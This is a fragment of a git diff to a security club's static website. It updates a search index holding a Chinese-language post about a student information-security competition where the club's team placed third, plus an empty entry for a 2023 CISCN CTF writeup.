\u4fe1\u606f\u5b89\u5168\u94c1\u4eba\u4e09\u9879\u8d5b\u662f\u4e00\u9879\u9762\u5411\u5927\u5b66\u751f\u7684\u516c\u76ca\u6027\u79d1\u6280\u7c7b\u7ade\u8d5b\uff0c\u7531\u4e2d\u56fd\u4fe1\u606f\u4ea7\u4e1a\u5546\u4f1a\u4fe1\u606f\u5b89\u5168\u4ea7\u4e1a\u5206\u4f1a\u53d1\u8d77\u4e3b\u529e\uff0c\u901a\u8fc7\u6574\u5408\u4fe1\u606f\u5b89\u5168\u4ea7\u4e1a\u8d44\u6e90\u5bf9\u63a5\u9ad8\u6821\uff0c\u4e3a\u5927\u5b66\u751f\u63d0\u4f9b\u4e00\u4e2a\u8fdb\u884c\u4fe1\u606f\u5b89\u5168\u6280\u672f\u521b\u65b0\u3001\u6df1\u5165\u4ea7\u4e1a\u884c\u4e1a\u5e94\u7528\u4ee5\u53ca\u6269\u5c55\u5b89\u5168\u89c6\u91ce\u7684\u5e73\u53f0\uff0c\u63a8\u52a8\u6821\u4f01\u5408\u4f5c\u6a21\u5f0f\u7684\u4fe1\u606f\u5b89\u5168\u4eba\u624d\u57f9\u517b\uff0c\u4ece\u800c\u5b9e\u73b0\u4fe1\u606f\u5b89\u5168\u4f18\u79c0\u4eba\u624d\u7684\u57f9\u517b\u548c\u9009\u62e8\u6e20\u9053\u3002

\u5927\u8d5b\u5f3a\u8c03\u8d34\u8fd1\u5b9e\u6218\uff0c\u4ee5\u4fe1\u606f\u5b89\u5168\u5178\u578b\u884c\u4e1a\u5e94\u7528\u573a\u666f\u4e3a\u5927\u8d5b\u73af\u5883\uff0c\u91cd\u70b9\u68c0\u9a8c\u53c2\u8d5b\u5b66\u751f\u9762\u5bf9\u771f\u5b9e\u73af\u5883\u4e0b\u7684\u4fe1\u606f\u5b89\u5168\u5de5\u7a0b\u80fd\u529b\u548c\u653b\u9632\u6280\u672f\u80fd\u529b\u3002

\u5927\u8d5b\u5f3a\u8c03\u4f01\u4e1a\u4e0e\u9ad8\u6821\u7684\u8054\u5408\uff0c\u901a\u8fc7\u6821\u4f01\u5bf9\u63a5\u7684\u4f01\u4e1a\u5bfc\u5e08\u52a0\u5b66\u751f\u6218\u961f\u7684\u6a21\u5f0f\uff0c\u5c06\u4f01\u4e1a\u8d44\u6e90\u7eb3\u5165\u5230\u9ad8\u6821\u7684\u4fe1\u606f\u5b89\u5168\u76f8\u5173\u4e13\u4e1a\u4eba\u624d\u57f9\u517b\u4e2d\uff0c\u5e76\u5b9e\u73b0\u4eba\u624d\u4ece\u9ad8\u6821\u5230\u4f01\u4e1a\u7684\u65e0\u7f1d\u5bf9\u63a5\u3002

\u4fe1\u606f\u5b89\u5168\u94c1\u4eba\u4e09\u9879\u8d5b\u4e3a\u4e00\u9879\u5468\u671f\u4e3a\u4e00\u5e74\u7684\u5168\u56fd\u6027\u8054\u8d5b\u8d5b\u4e8b\uff0c\u7531\u591a\u4e2a\u533a\u57df\u5206\u7ad9\u8d5b\u548c\u5e74\u5ea6\u603b\u51b3\u8d5b\u7ec4\u6210\u3002

\u672c\u534f\u4f1a\u7684CodeMonster\u6218\u961f\u8363\u83b7\u7b2c\u4e09\u540d\uff0c\u62ff\u4e0b\u4e09\u7b49\u59565000\u5143\u5956\u91d1\u3002

","tags":["\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/f72cbee7-1294-46b9-92e3-49a3140255b2/#_1","title":"\u6bd4\u8d5b\u56fe\u7247","text":"

\u83b7\u5956\u56fe\u7247\uff1a

","tags":["\u5b66\u672f\u7ade\u8d5b"]},{"location":"writeup/CISCN-CTF-Quals-2023/","title":"2023\u5168\u56fd\u5927\u5b66\u751f\u4fe1\u606f\u5b89\u5168\u7ade\u8d5b\u521d\u8d5bWriteup","text":"

11

"}]} \ No newline at end of file diff --git a/sitemap.xml.gz b/sitemap.xml.gz index e4a3c15809926e462a269c121c8d2b58ea8801f1..a932b02d18d756dd677d3befc3c55f370a5ab142 100755 GIT binary patch delta 14 VcmaFP@|=ZLzMF$%2023全国大学生信息安全竞赛初赛Writeup - +

11